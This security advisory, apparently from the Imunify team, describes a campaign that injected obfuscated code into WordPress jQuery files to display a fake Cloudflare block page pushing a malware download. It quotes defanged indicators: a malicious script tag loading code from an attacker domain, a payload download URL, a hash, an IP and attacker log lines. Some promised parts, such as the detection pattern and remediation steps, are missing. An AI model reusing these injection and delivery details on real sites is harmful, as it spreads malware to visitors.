On Sep 15, we detected a malicious campaign. It was evident that the attackers we discovered were using phishing techniques to trick users into downloading a malicious binary file. They used a fake message on websites stating that a user has been blocked by Cloudflare. Meanwhile, infected websites getting the message would not necessarily even use Cloudflare services.
Nevertheless, once the user clicked on this fake popup, the binary malware was downloaded to their computer. Clicking on "Check the system" button leads to a malicious binary (sha256: fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9) downloading. Here is the download link revealed:
# https://gitlab[.]com/devang-acespritech/openck/-/raw/main/CloudSt.zip
The archive being downloaded is only 10 MB, but the unpacked binary weighs about 700 MB. It seems evident that the attackers intentionally went for distributing the sizes of packages in such a way that these files will go under the radar and will not be uploaded to numerous online virus scanning services.
In all the cases of infection, we found an identical injection in the website files. It looks like this:
./wp-includes/js/jquery/jquery.js
./wp-includes/js/jquery/jquery.min.js
The injection is heavily obfuscated, unfortunately, but it can be discovered if one looks for the following pattern:
This code, after being executed, injects another malicious script into the source code of the page:
<script src="https://gloogletag[.]com/tagged/ajax.js">
The code shown above loads the HTML code of the fake Cloudflare form using the following url:
https://gloogletag[.]com/code/cloudflare.txt
Upon discovering this infection, we went for an investigation. After examining the web server logs, we found out that the hackers used the very same method in all of the registered cases.
For this attack to start, the hacker needs to have access to the compromised WordPress administrator account. After successful authorization, the attacker needs to install the wp-file-manager plugin.
35.184.195.84 - - [15/Sep/2022:08:55:44 -0400] "POST /wp-login.php HTTP/2.0" 302 - "https://victim/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:55:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 193 "https://victim/wp-admin/plugin-install.php?s=file+manager&tab=search&type=term" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:56:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 279 "https://victim/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
In all of the cases we registered, the IP address from witch this attack was carried out was the same: 35.184.195.84.
gloogletag[.]com
35.184.195.84
fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9
Please consider following these steps:
The Imunify team cares about your infrastructure security. We always strive to keep you up-to-date with all the information necessary to protect your website and make sure that your business runs smoothly at all times. Please don't hesitate to address any questions you have about protecting your website from malicious activity to our Imunify360 support team.